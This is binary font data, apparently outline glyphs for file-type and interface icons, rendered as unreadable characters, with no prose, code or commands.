��  	@`5<LZe���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+7";2+"&51#1;2654&+"&546;234&+532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �&% 

 
 % &% 

 
 % �`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 %%


&%%


%@@%%`�@

@�`"2@Kz��%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+7";2+"&51#1;2654&+"&546;234&+3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� % &  
`
 �&% 

 
 % &% 

 
 % � @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 %%


&%%


%@�`%% @

@`5<LXy�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535#+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ `  ` & %& & 
 

 
 `&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �  �%&`%%

`

�%%


&%%


%@�`"2>_�%#!"&5463!;!"3!;!2#!"&=46#35#535##+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[ `  `  
 

 
 & &% &`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&`�  �  �

`

%%`&%�%%


&%%


%	@`5<LZep{�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+%32+5326=4&+!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[` & % @
`
 �`%&` @

@� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 &`%� �
`
��  @�`"2@KVai%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+%326=4&+326=4&+!3535#�%� %&@&���(88( �
��� &%��&%[ % &  
`
 �`&%` @

@� @��@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 �%`& �
`
��  @`5<LXek5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#%'#353735##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[@ 00 @@ 00 0       �  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT�`�@@�� �@�`"2>KQ%#!"&5463!;!"3!;"3!26=4&#'373#'#%73#5#'#53#53�%� %&@&���(88( �
���%& %&� @ 00 @@ 00 0       @� �@%&�&�%@8(�(8�
�&�%&�%�pTTppTT�`�@@�� �@`5<LYfl5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#5'53753'#353735##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ @ 00 p0       �  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�```  HH  @`�@@�� �@�`"2?LR%#!"&5463!;!"3!;"3!26=4&##5'5375373#5#'#53#53�%� %&@&���(88( �
���%& %&�@ @ 00 p0       @� �@%&�&�%@8(�(8�
�&�%&�%�```  HH  @`�@@�� �@`5<LX5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4653#5##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[  `   `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�``�`@�`"2>%#!"&5463!;!"3!;"3!26=4&#53#5##53�%� %&@&���(88( �
���%& %&�  `  �@%&�&�%@8(�(8�
�&�%&�%�`�``�`@`5<LXdp5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#37'373#'#73#53#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;����`�@ 00 @@ 00 ���` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ pTTppTT`@ � @ @�`"2>JV%#!"&5463!;!"3!;"3!26=4&#3#53#37'373#'#73#53#3�%� %&@&���(88( �
���%& %&�����`�@ 00 @@ 00 ���`�@%&�&�%@8(�(8�
�&�%&�%�@ � @ pTTppTT`@ � @ @`5<LZelx5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+73#'3#35#535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �0 @ @ � `  ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
���� �  �  @�`"2@KR^%#!"&5463!;!"3!;"3!26=4&###546;2#'"354&+73#'3#53#3#53�%� %&@&���(88( �
���%& %&��` & % @
`
 �0 @ @ � `  ` �@%&�&�%@8(�(8�
�&�%&�%�`�%%��
  
����   �  
@`5<LWbnw��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+532+#732654&#%32+"&=46";26=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&` @

@�`%&@  @

�` %& %&

 

  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 @%%`�@

 &`%&`% 
`

`
	@�`"2=HT]m~%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+3532654&+32654&#%";26=4&#";26=4&+�%� %&@&���(88( �
��� &%��&%�`&%` @

@� @&%` @

�`&% &% 

 

 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 �`%% @

 %`&%`& 
`

`

`5<LWbr���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#32+5326=4&+732+"&=46";26=4&+33535#'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� `%&` @

@� %& %&

 

 � @�@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%@&`%� �
`
 &`%&`% 
`

`
��  PpTTppTT	�`"2=HXiq}%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&#";26=4&+33535#373'7#'#`%� %&@&��`(88(��
��`�&&� &&`&%` @

@�&% &% 

 

 � @�@ 00 @@ 00 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
��  PpTTppTT`5<LX^��!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#'373#'#%#537";2+"&51#1;2654&+"&546;234&+'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&�`@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�pTTppTT  �%%


&%%


%ppTTppTT�`"2>Dr~%#!"&5463!;!"3!;"3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546'373#'#`%� %&@&��`(88(��
��`&&�&&�`@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@ 00 @@ 00 �@%&�&�%@8(�(8�
�&�%&�%�pTTppTT  �%


%%&


%%ppTTppTT	@`5<L\mx��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+732+5326=4&+7";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 �`%&` @

@�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
 &`%� �
`
 %%


&%%


%@�`"2BS^i�%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+7326=4&+326=4&+7";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 �`&%` @

@�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
 �%`& �
`
 %%


&%%


%	@`5<LXamv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#532+#732654&#%";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&@  @

��`%&@  @

`&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 @%%`�@

 %%


&%%


%@�`"2>GS\�%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%� @&%` @

�� @&%` @

`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �`%% @

 %%


&%%


%	@`5<LWbr��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+732+"&=46";26=4&+33535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@� %& %&

 

 � @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 &`%&`% 
`

`
��  @�`"2=HYjr%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&+";26=4&+33535#�%� %&@&���(88( �
��� &%��&%`&%` @

@�&% &% 

 

 � @��@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
��  @`5<LT`h5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535#'373#'#%3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@ 00 @@ 00  @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  PpTTppTT���  @�`"2:FN%#!"&5463!;!"3!;!2#!"&=463535#373'7#'#3535#�%� %&@&���(88( �
��� &%��&%[ @�@ 00 @@ 00  @��@%&�&�%@8(�(8�
�%�&%�&`��  PpTTppTT ��  @`5<LZcku5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&#33535#535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%U `%%@&Z@

� @�� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

��  @@ �` @�`"2@IQ[%#!"&5463!;!"3!;!2#!"&=463'2654&+35532654&#33535#535#3535�%� %&@&���(88( �
��� &%��&%U@&@%%` @

� @�� `�@%&�&�%@8(�(8�
�%�&%�&�``%%�``@

��  @@ �` @`5<LY\gn5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735##73535#5#73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       �::    `0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��Pp@@ �� ���@�`"2?BMT%#!"&5463!;!"3!;!2#!"&=46'#353735#53535#5#'#37#�%� %&@&���(88( �
��� &%��&%k0       �::    `0 @ @ �@%&�&�%@8(�(8�
�%�&%�&�`�@@��PP @@ �� ���@`5<LV\c5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46535#3535#53?3#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;�� `� �0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ �` ` ����@�`"2<BI%#!"&5463!;!"3!;"3!26=4&#3##53##53?3#'3�%� %&@&���(88( �
���%& %&�`` ��@� �0 @ @ �@%&�&�%@8(�(8�
�&�%&�%� `� � ����@`5<LYen�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735#532+#732654&##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       @`%&@  @

�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��@@%%`�@

`@
`
 %`&� @�`"2?KTm%#!"&5463!;!"3!;!2#!"&=46'#353735#3532654&+32654&##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%k0       @ @&%` @

�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&�`�@@��@�`%% @

`@
`
 %`&� @`*C`gw%7'>=4&+";267'#"&=46;2'5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535#V% &% 

 
,"g���&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ @��	`&%`&
`

`
," `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  @�`"2I]e%#!"&5463!;!"3!;"3!26=4&#+"&=46;2''#"&=46;2'7#53##�%� %&@&���(88( �
���%& %&�� %& %

 
,"�@�@ �@%&�&�%@8(�(8�
�&�%&�%��&`%&`	
`

`
,"�  �@`5<LYep{5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735##35#535#732+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�0       ` `  `�`%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@�� �  �   &`%� �
`
@�`"2?KVa%#!"&5463!;!"3!;!2#!"&=46'#353735##35#535#7326=4&+326=4&+�%� %&@&���(88( �
��� &%��&%�0       ` `  `�`&%` @

@�@%&�&�%@8(�(8�
�%�&%�&�`�@@�� �  �   �%`& �
`
@`5<Ly���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4646;2+"&53;2654&+532654&+"#"&=46;5#";5#37532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%& %

& % 
 

  

 
 @

``&%``@@`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%%		%%


 


@@
`
 %`&� @@%%`�@

@�`"2_x��%#!"&5463!;!"3!;!2#!"&=46346;2+32+"&5#;2654&'>54&+"#"&=46;5#";5#373532654&+32654&#�%� %&@&���(88( �
��� &%��&% 
 

  

 
 % &

% &@@

``&%``@@ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�


 


%%		%%[@
`
 %`&� @�`%% @

	`5<LZeq{�!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&###546;2#'"354&+3#35#535#535#35353535#3535`@(88(��%� %&`� ��(88(@�%��

�
�
v��&%�&%��` & % @
`
 � `  `��� ``�� ` 8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�`�%%��
  
�  �  @@ �` @ �` �`"2@KWak%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+3#35#535#535#35353535#3535`%� %&@&���(88(`�
����%&�`%&� % &  
`
 � `  `��� ``�� `�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
�  �  @@ �` @ �` 	@`5<LZes~�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 ` & % @
`
  & %& & 
 

 
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
``�%%��
  
�%&`%%

`

@�`"2@KYd�%#!"&5463!;!"3!;"3!26=4&###546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653�%� %&@&���(88( �
���%& %&�`` & % @
`
 ` & % @
`
  & %& & 
 

 
 �@%&�&�%@8(�(8�
�&�%&�%�`�%%��
  
``�%%��
  
�%&`%%

`

@`5<LZhsz5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#'#5373537##546;2#'"354&+73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�00      �` & % @
`
 �0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��``�@@��``�%%��
  
����@�`"2@NY`%#!"&5463!;!"3!;"3!26=4&##'#5373537##546;2#'"354&+73#'3�%� %&@&���(88( �
���%& %&�p00      �` & % @
`
 �0 @ @ �@%&�&�%@8(�(8�
�&�%&�%��``�@@��``�%%��
  
����@`5<LVbnw5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4675#3357#35#535#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[�����@ `  `�`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��  �  ��  �   @%%`�@

@�`"2<HT]%#!"&5463!;!"3!;!2#!"&=4675#3357#35#535#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%[�����@ `  `� @&%` @

�@%&�&�%@8(�(8�
�%�&%�&��  �  ��  �   �`%% @

@`5<L\mu}5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+33535#!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 � @� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
��  ��  @�`"2BS[c%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+33535#!3535#�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 � @� @��@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
��  ��  @`5<LTmw5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535##"&=46;5#";5#375#335����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@@

``&%``@`����� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  `@
`
 %`&� @�  �  @�`"2:S]%#!"&5463!;!"3!;!2#!"&=463535##"&=46;5#";5#375#335�%� %&@&���(88( �
��� &%��&%[ @�@@

``&%``@`������@%&�&�%@8(�(8�
�%�&%�&`��  `@
`
 %`&� @�  �  @`5<LWbo�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+'#353735##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@�0       �@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
@`�@@��@
`
 %`&� @�`"2=HUn%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+'#353735##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%`&%` @

@�0       �@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
@`�@@��@
`
 %`&� @`5<LX���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535#7";2+"&51#1;2654&+"&546;234&+;2+"&=46";26=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ `  `�&% 

 
 % &% 

 
 % � %& %&

 

  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �   %%


&%%


%&`%&`% 
`

`
@�`"2>m~�%#!"&5463!;!"3!;!2#!"&=46#35#535#7";2+"&51#1;2654&+"&546;234&+3";26=4&+";26=4&+�%� %&@&���(88( �
��� &%��&%[ `  `�&% 

 
 % &% 

 
 % �&% &% 

 

 �@%&�&�%@8(�(8�
�%�&%�&`�  �   %%


&%%


%%`&%`& 
`

`

@`5<LZcq|��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&###546;2#'"354&+##532##'32654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%U `%%@&Z@

�` & % @
`
 � `%%@&Z@

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

``�%%��
  
``�%%`�@

	@�`"2@IWbpy%#!"&5463!;!"3!;"3!26=4&###532##'32654&###546;2#'"354&+##532##'32654&#�%� %&@&���(88( �
���%& %&� `%%@&Z@

�` & % @
`
 � `%%@&Z@

�@%&�&�%@8(�(8�
�&�%&�%�`�%%`�@

``�%%��
  
``�%%`�@

@`5<Leq{5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#"&=46;5#";5#37#35#535#535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�@

``&%``@` `  `��� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@
`
 %`&� `�  �  @@ �` @�`"2KWa%#!"&5463!;!"3!;!2#!"&=46#"&=46;5#";5#37#35#535#535#3535�%� %&@&���(88( �
��� &%��&%�@

``&%``@` `  `��� `�@%&�&�%@8(�(8�
�%�&%�&�@
`
 %`&� `�  �  @@ �` �	5	!!!�������r��s���s����� �	7!53!7%"&54632�``�``�%%%%��``�`���```%%%%`'#'3!53!3�����@�@�`� ��� ����@	���'!!3#3#3#3#3#3#!!333!�@���������������@����@@�������������@���@@@#5!3!265!!!!!!!!3#!!���%`(8���@����������@�����@%8( ����@@@@@@@@�����2'7>%''`B^@�@1��@ P�<�@8��^B1@�@� ��@P��@8����7'.'7#%5���@�@�;2c����������N@@�@�@��2;N��������������6$3#*10��Q�c��|H�0�@�d8�O�������	6	&7>%811.54632#"&'0>781>7���'P�f��
iiN98((88(	��9s��
���P��'�
��s9	(88((8��9Nii
���9234.234.7.54632#"&'%?�7j30W&%;`e��G�225`Fz�@��%%%	��@@�`;%&W03j7��e�`522�G]�zF�@@�`�	%%%���@����%&"'1;0232677'764'#5�&j&�y�k�(
�
�j�z�%%��m�m�*�%%�z�j�'�
�k�y�&j&�em�m�*���a�6.'32>7>&'#"&'32>7>'aK\j77j\KHYe55eYH~!|F)N!

,TJ="
"�E�wl//lw�E+XXV).L66L.)VXX+��>K-?'@�5*0�A���)-#54&#!"3!26=3!#";2654&+5!5!�&�@&&�&��� 

�

 @�@���@&&�&&@��
��

@
@�@�!-48181!8181!5!"3!2654&##"&54632!537������&&�&&�8((88((8@��@�@�@&�&&&�(88((88�����������,<HO#54&#!";3!2654&#8181!81!"81!8181!81#"&54632!537@@&��&&@&�&&�&@��&�����8((88((8@��@�@@&&�&@&&&@��@&��(88((88�������@+?C32>54.#"#.#!"#"3!2654&".54>32#530!8L++L8!!8L++L8!��$0�0$�&&�&&�&;gM--Mg;;gM--Mg���`+L8!!8L++L8!!8L50PP0&��&&@&��-Mg;;gM--Mg;;gM-�@���	L#32654&!";74.#".54>32.'>54&'>5 @@
�

@�P��jj��P4F),Aq�VV�qA,)F4��@
�

��
�@j��PP��j.X)9*L;'�
*V�qAAq�V*
�D';L*9)X.���*3#".54>32#".54>32�@#=R..R=##=R./S�#=R..R=##=R./S�� !:,,:!!:,pr�!:,,:!!:,p@@(,.#"32>7>54.'
�6qvy??yvq66qvy??yvq6��@�� )TY[//[YT))TY[//[YT)�����	@@"!#535#535#53!!#535#535#53%��������@����������@��@�������������������@@+/4632#"&%4632#"&54&#!"3!26=!5!�^BB^^BB^��^BB^^BB^&��&&�&����B^^BB^^BB^^BB^^�`&&��&&`��������'3?K[!"3!2654&"&54632"&54632"&54632"&54632"&54632.#!"463`�B^^BB^^��(88((88((88((88�(88((88�(88((88((88((88X:�B^I7&^B�B^^BB^�@8((88((8�8((88((8�8((88((8�8((88((8�8((88((8�7I^B�:X}&@����".#"32>72#"&5463�#Wcn:j��PP��j:ncW#��@))))
)B/P��jj��P/B)M�))))��2�!.'1897!5.'>&2IeF--FeI{j�f
Q.�.Q
f�jd6aWM!!MWa6\ɋ&GX|&&|XG&������O">7>54.#".'.#"3267>7!5.'32>54.#,N'8" 8K**K8 "8'N,+K8!!8K+,N
))3�3))
N,+K8!!8K+7"

(YN-+L8""8L+-NY(

"!8M++M9 #
 8_L8&&8L_8 
# 9M++M8!���@�	��@@����"F[e�4.'81#0130412>5"&'.'.5467>7>32467#*10232.'?>'"&'.'.5467>7>32#0SE~�ii�~ES0#�				��$B&3773&B$t�Rv	vK�c90AE"Q./Q"EB0:c�L�� .wBBw.!

!.wBBw. 6'K#_X_#K���
0B
....
��$EQ2.#"'>3%>32.#"1.#"'>7>324632#"&�O�4Z#]55]#Z4�O�;.hs|@@|sh.[$T\c33c\T$�(LGC[6~��MM��~6[CGL(*UWZ--ZWU��%%%%�<5Z#((#Z5<E-F//F-[$8&&8$�)17[6T::T6[71)		��%%%%���%Do4.#"!'>.54632'>54&#".54>32''>54.#".54>32P��jj��P1Y{I�I{Y1��%%3,:K55K:,KDW(F]55]F(WDK�I/P: 2WuBBuW2 :P/I<dH(Gy�]]�yG(Hd<�j��PP��jS�}_  _}�(%%;;	F.5KK5.F	�O5aJ,,Ja5O����;O`5BuW22WuB5`O;�SkE]�~JJ~�]EkSp-AU4632#"&>54&'.54>7#.54>7>54.�K55KK55K&>,,>&!''!��'!&>,,>&!'�$4!6W>"">W6!4$�6W>"">W6!4$$4�5KK55KKN;HT..TH;4�SS�4��S�4;HT..TH;4�S@zn`("]o~DD~o]"(`nzp"]o~DD~o]"(`nz@@zn`����
.2654&#"#".=##!5#5>=�B^^BB^^"#=R..R=#@(E]6�@�6]E(^B�B^^B��B^`.R=##=R.``8bM1�@@�1Mb8`@����&!"&5463!!"3!181"389!5!��`(88(`��5KK5� 

`��@��8((8K5�5K��@

@@H@#'8#";2654&#53%#";2654&#537?>'.�

�
-��`�

�
-���� ���@
�@

�
�@�
�@

�
�@OW��	W;��@�'-%5#35#3#35#3#35#3#35#3##!53!5@@�@�@�@�@�@�@�@@@@��@��@�@@���@@���@@���@@��@@@���@@����#!"3!2654&!!!!!!!!!!`�(88((88H�@�����@��@��@��@�8(��(88(@(8����@@@@@�@����'1!"3!2654&!!!!!!4632#"&#"!54&`�(88((88H�@�����@��@@8((88((8��(8@8�8(��(88(@(8���@@@@�(88((888&@@&@����!7.'.'.#!"3!2654&''#5#!"&54630:1;�-3')�!//!�!/�%
�)�	� 		���
��3-/!��!//!p)'6)�
%��		`	�
@����"8K.'.'.#!"3!2654&''#5#!"&54630:1;.#!"463!.�-3')��!//!`!/�%
�)o	��		s�s
��')��!/%	�[3-/!� !//!�)'6)�
%�		�	�
�/!� ,.	@����!7ESa.'.'.#!"3!2654&''#5#!"&54630:1;!"&5463!2'!"&5463!2'!"&5463!2�-3')�!//!�!/�%
�)�	� 		���
�@

�

�@

�

�@

�
�3-/!��!//!p)'6)�
%��		`	�
�



�



�



@����+3I%!575#"&546327.'.'.#!"3!2654&''#5#!"&54630:1;@����8((88((8V-3')�!//!�!/�%
�)�	� 		���
�@�@����(88((88�3-/!��!//!p)'6)�
%��		`	�
@����#9a.'.'.#!"3!2654&'1'#5#!"&54630:1;..#"326=%.#"32654&'�-3')�!//!�!/�%
�)o	� 		���
���!5KK55K!5KK55K�3-/!��!//!p)'6)�
%��		`	�
G@�8((88(�3�8((88(@
@����$:
.'.'.#!"3!2654&''#5#!"&54630:1;�@��-3')�!//!�!/�%
�)�	� 		���
�@��[3-/!��!//!p)'6)�
%��		`	�
@����%;?C.'.'.#!"3!2654&'9'#51#!"&54630:1;!!%7'�-3')�!//!�!/�%
�)o	� 		���
�@��@���3-/!��!//!p)'6)�
%��		`	�
��������
@����%;?CGKOSW[jn.'.'.#!"3!2654&'9'#51#!"&54630:1;3#;##3#;##3#;##3#;#;26=4&+5##5�-3')�!//!�!/�%
�)o	� 		���
��������������������������P����3-/!��!//!p)'6)�
%��		`	�
@@@@@@@@���@�@@���!!!%#35!#!35!��@�����e�@��e��@������e������ee���@���
47=#54&+"#!'#58138154&+3#!35#"3!!#!35!��&�&����@
@ ��� @

 ��@e��@@@&&@��@@��
@���@@
��
��[e�@���
	
%	7%	7��V�����g��g��g��g���������3�3�3�3�@!!����@��@@@
%!!!@������ ���@��@��@'!!##5#53533@��@��������������@�����@	'!!!5!@��@�����������@�@'!!'333@��@�ࠀ����������@'!!###@��@�ࠀ��������"���!"27>54&"&54632��0�$�(���(88((88��$(�d�0���8((88((8"���.!"27>54&"&54632#"2?��0�$�(���(88((88�x P0�$�(��$(�d�0���8((88((8� �$(�d@@#'+/37;?3#3#3#3#3#3#3#3#3#3#73#73#%3#%3#'3#%3#���@@�@@�@@@@�@@��  �  �  ��@@�@@�@@@@@@@@�������@��������������������������@@@@@@@@@@@@@@9���"&*.26:>BFJNRVZ^bfjnrvz~��������������������������!!1!3#%!!1!3#!!1!3#3#;##3#;##3#;##3#3#;##3#;##3#;##3#;#3#%3#73#'3#%3#;#73#;#73#;#73#;#73#3#%3#73#;#73#73#3#%3#73#73#;#73#3#%3#;#73#;##3#73#73#@�@�����@�@������@�@�����@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@�@@��@@@@@�@@@@@@@@@@�@@@@@@@@@@@@@@@@@@@@��@@@@@@@@�@@@@@@@@��@@@@@�@@@@@@@@@@@��@@@@@@@@@@@�@@�@@�@@��@�������@������@�@������@@@@@@@@@@@@@@@@@@@�@@@@@@�@@�@@�@@�@�@@@�@@@@�@�@@@�@@@@�@�@�@@�@@@@@@@����,1''#"&546?'&"7>322764'	@����J !%6 J@��J !%6 J@T���������J 6%! J��@J 6%! JT@���������0%#"&54632#"&54632!4&+33!5!"&585�8((88((8�8((88((8�%��0K5�% (88((88((88((88x�%@�d45K@%����';?C"32>54.".54>32535#5##3#3353+53#53�c��KK��cc��KK��cP�i<<i�PP�i<<i�0��@����@��@@�@@�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<��@@@��@@@��������'r"32>54.".54>32&+"&'32654&+532654&+>;27>'.+"#";#";;2676&'�c��KK��cc��KK��cP�i<<i�PP�i<<i�o
-�2	�

��

�	2�-
J+�:X#

  

#X:�+J�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<$

@

$%+I7

@

7I+%����'V"32>54.".54>327#532654&+546327>'.#"#";!2654&#�c��KK��cc��KK��cP�i<<i�PP�i<<i�0�`

`8(,
J+B^ 

  

�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<�

 (8%+^B 

�

����'b"32>54.".54>322654&+76&'&'.#";#";326=32654&+53�c��KK��cc��KK��cP�i<<i�PP�i<<i�0

D_ee_D

``

`

`

``�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<`

����

@

`

`

@@@#'+/!"3!2654&!2!546!"&5!%3#73#73#���(88(@(88��@
��M��
���@@�@@�@@@8(��(88(@(8@
``
��
 ��
